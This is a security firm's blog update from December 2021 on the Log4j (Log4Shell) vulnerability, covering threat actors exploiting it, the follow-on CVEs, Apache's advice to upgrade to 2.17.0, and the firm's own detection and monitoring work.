Writing about security topics from Fortis experts

A Log4j RCE Vulnerability Update

The Fortis Security, Incident Response, and Threat Intelligence teams have been tracking activity related to the recently exploited Log4j remote code execution (RCE) vulnerability, also known as Log4Shell.  Since this vulnerability came to light one week ago, the Fortis team has been diligently and aggressively both threat hunting in our customers' environments as well as developing and implementing new detection signatures to alert on possible malicious scanning and/or post-exploitation activity based on known indicators of compromise.

Although there are scattered reports of APT groups, ransomware groups, and threat actors beginning to use this vulnerability as an initial access vector for dropping second-stage payloads and potentially deploying ransomware, the majority of exploitation activity that has been seen since initial exploits is related to installation of cryptocurrency miners and use by the Mirai and other botnets.

The instances of ransomware and post-exploitation activity that have been observed have primarily been reported to involve the Khonsari ransomware family, dropping of Cobalt Strike beacons, and the use and sale of this vulnerability by access brokers.  Several sources have reported activity beginning to emerge that is being attributed to known APT groups and threat actors in China and Iran as well as potentially North Korea and Turkey.  Most notable of these groups are Iranian-based APT 35 (aka Charming Kitten or Phosphorus) and Chinese-based HAFNIUM, who are best known for their exploitation of Microsoft Exchange servers early in 2021. 

This vulnerability in Log4j is being leveraged as an initial access vector, which is an early phase in the what is known as the cyber kill chain.  This stage comes after the first two stages of reconnaissance and resource development and before execution, persistence, and privilege escalation.  It is projected that either brokered or natively obtained access to environments will be used by these threat actors either in the short term or long term as threat actors have been known to lie quiet in a compromised environment for extended periods of time before actively deploying ransomware or mass exploitation.

Official mitigation advice has been updated to include mitigating the implications of the new CVE-2021-45046 which was discovered after the 2.15.0 patch was released.  This new CVE has recently been upgrade to a CVSS score of 9.0.  Currently, this CVE has only been demonstrated in MacOS environments.  A third vulnerability, CVE-2021-45105 (CVSS 7.5), was also released which addressed the risk of denial of service conditions due to the possibility of infinite recursion.

Apache currently recommends updating to version 2.17.0 as this addresses all three known CVEs for Log4j.  Several previous mitigation recommendations have now been deprecated by the Apache team due to the fact that they leave additional attack vectors open versus completely remediating the vulnerability.  The current recommendation for safe and comprehensive mitigation is to update to the most recent safe version (2.17.0 as of 12/20/2021) or remove the JndiLookup class from the log4j-core jar.  Please review the "Older (discredited) mitigation measures" headings in the attached Apache link for additional technical details.

Overall recommendations remain to prioritize asset inventory, isolation of vulnerable assets and aggressive patching for this vulnerability to limit the attack surface. Continue working with third-party vendors to apply recommended patches for their products as well as encouraging end users to apply approved and recommended updates.  Additional recommendations include limiting outbound connections to trusted destinations and monitoring for suspicious or unapproved outbound traffic, including LDAP connections, from either inside the network or the DMZ.  These outbound connections to listening IPs may result in redirects to IPs that host second-stage payloads to be delivered to the target.

Primary activity that has been observed by the Fortis team has been mass scanning activity with some attempts at data exfiltration based on specially crafted commands.  Many vendors were able to quickly identify malicious IP addresses and domains and add them to threat feeds and block lists almost immediately thanks to the mobilization of the entire security community.  Massive data has been collected both by the Fortis team and the security research community to assist in building actionable detections for this activity.  However, the ease at which this vulnerability is tested and exploited complicates these indicators, rendering many of them low fidelity or benign.  Nonetheless, the Fortis team has implemented alerting based on current intelligence and all current updated signatures released by vendors.  Additionally, the team has put in place proprietary behavior-based alerts for products that we ingest for our customers including EDR tools, firewalls, Fortis IDS sensors, and DNS-based alerting.

As the number of cyberattacks continues to increase at an exponential level, the Fortis team remains vigilant in our mission to stop breaches before they occur. We are fighting for you with 24x7x365 monitoring of your environment through our Security Operations Center (SOC), Incident Response, and Threat Intelligence teams to help lower the time to detect and respond to active threats.  Our Incident Response team is always ready to engage at (844) 297-4853.

References and additional information: